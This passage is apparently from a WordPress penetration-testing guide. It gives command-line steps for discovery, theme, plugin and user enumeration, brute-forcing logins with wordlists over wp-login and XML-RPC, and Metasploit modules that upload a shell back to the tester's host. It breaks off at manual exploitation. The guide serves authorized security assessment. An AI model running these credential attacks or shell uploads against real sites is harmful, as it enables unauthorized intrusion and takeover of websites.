WordPress Penetration Testing
Purpose
Conduct comprehensive security assessments of WordPress installations including enumeration of users, themes, and plugins, vulnerability scanning, credential attacks, and exploitation techniques. WordPress powers approximately 35% of websites, making it a critical target for security testing.
Prerequisites
Required Tools
- WPScan (pre-installed in Kali Linux)
- Metasploit Framework
- Burp Suite or OWASP ZAP
- Nmap for initial discovery
- cURL or wget
Required Knowledge
- WordPress architecture and structure
- Web application testing fundamentals
- HTTP protocol understanding
- Common web vulnerabilities (OWASP Top 10)
Outputs and Deliverables
- WordPress Enumeration Report - Version, themes, plugins, users
- Vulnerability Assessment - Identified CVEs and misconfigurations
- Credential Assessment - Weak password findings
- Exploitation Proof - Shell access documentation
Core Workflow
Phase 1: WordPress Discovery
Identify WordPress installations:
curl -s http://target.com | grep -i wordpress
curl -s http://target.com | grep -i "wp-content"
curl -s http://target.com | grep -i "wp-includes"
curl -I http://target.com/wp-login.php
curl -I http://target.com/wp-admin/
curl -I http://target.com/wp-content/
curl -I http://target.com/xmlrpc.php
curl -s http://target.com | grep "generator"
nmap -p 80,443 --script http-wordpress-enum target.com
Key WordPress files and directories:
/wp-admin/ - Admin dashboard/wp-login.php - Login page/wp-content/ - Themes, plugins, uploads/wp-includes/ - Core files/xmlrpc.php - XML-RPC interface/wp-config.php - Configuration (not accessible if secure)/readme.html - Version information
Phase 2: Basic WPScan Enumeration
Comprehensive WordPress scanning with WPScan:
wpscan --url http://target.com/wordpress/
wpscan --url http://target.com --api-token YOUR_API_TOKEN
wpscan --url http://target.com --detection-mode aggressive
wpscan --url http://target.com -o results.txt
wpscan --url http://target.com -f json -o results.json
wpscan --url http://target.com -v
Phase 3: WordPress Version Detection
Identify WordPress version:
wpscan --url http://target.com
curl -s http://target.com/readme.html | grep -i version
curl -s http://target.com/feed/ | grep -i generator
curl -s http://target.com | grep "?ver="
curl -s http://target.com | grep 'name="generator"'
curl -s http://target.com/feed/
curl -s http://target.com/comments/feed/
Version sources:
- Meta generator tag in HTML
- readme.html file
- RSS/Atom feeds
- JavaScript/CSS file versions
Phase 4: Theme Enumeration
Identify installed themes:
wpscan --url http://target.com -e at
wpscan --url http://target.com -e vt
wpscan --url http://target.com -e at --plugins-detection aggressive
curl -s http://target.com | grep "wp-content/themes/"
curl -s http://target.com/wp-content/themes/
Theme vulnerability checks:
searchsploit wordpress theme <theme_name>
curl -s http://target.com/wp-content/themes/<theme>/style.css | grep -i version
curl -s http://target.com/wp-content/themes/<theme>/readme.txt
Phase 5: Plugin Enumeration
Identify installed plugins:
wpscan --url http://target.com -e ap
wpscan --url http://target.com -e vp
wpscan --url http://target.com -e ap --plugins-detection aggressive
wpscan --url http://target.com -e ap --plugins-detection mixed
curl -s http://target.com | grep "wp-content/plugins/"
curl -s http://target.com/wp-content/plugins/
Common vulnerable plugins to check:
searchsploit wordpress plugin <plugin_name>
searchsploit wordpress mail-masta
searchsploit wordpress slideshow gallery
searchsploit wordpress reflex gallery
curl -s http://target.com/wp-content/plugins/<plugin>/readme.txt
Phase 6: User Enumeration
Discover WordPress users:
wpscan --url http://target.com -e u
wpscan --url http://target.com -e u1-100
for i in {1..20}; do
curl -s "http://target.com/?author=$i" | grep -o 'author/[^/]*/'
done
curl -s http://target.com/wp-json/wp/v2/users
curl -s http://target.com/wp-json/wp/v2/users?per_page=100
curl -X POST -d "log=admin&pwd=wrongpass" http://target.com/wp-login.php
Phase 7: Comprehensive Enumeration
Run all enumeration modules:
wpscan --url http://target.com -e at -e ap -e u
wpscan --url http://target.com -e vp,vt,u,cb,dbe
wpscan --url http://target.com -e at,ap,u,cb,dbe \
--detection-mode aggressive \
--plugins-detection aggressive
Phase 8: Password Attacks
Brute-force WordPress credentials:
wpscan --url http://target.com -U admin -P /usr/share/wordlists/rockyou.txt
wpscan --url http://target.com -U users.txt -P /usr/share/wordlists/rockyou.txt
wpscan --url http://target.com -U admin -P passwords.txt --password-attack wp-login -t 50
wpscan --url http://target.com -U admin -P passwords.txt --password-attack xmlrpc
wpscan --url http://target.com -U admin -P passwords.txt --throttle 500
cewl http://target.com -w wordlist.txt
wpscan --url http://target.com -U admin -P wordlist.txt
Password attack methods:
wp-login - Standard login formxmlrpc - XML-RPC multicall (faster)xmlrpc-multicall - Multiple passwords per request
Phase 9: Vulnerability Exploitation
Metasploit Shell Upload
After obtaining credentials:
msfconsole
use exploit/unix/webapp/wp_admin_shell_upload
set RHOSTS target.com
set USERNAME admin
set PASSWORD jessica
set TARGETURI /wordpress
set LHOST <your_ip>
exploit
Plugin Exploitation
use exploit/unix/webapp/wp_slideshowgallery_upload
set RHOSTS target.com
set TARGETURI /wordpress
set USERNAME admin
set PASSWORD jessica
set LHOST <your_ip>
exploit
search type:exploit platform:php wordpress
Manual Exploitation
Theme/plugin editor (with admin access):
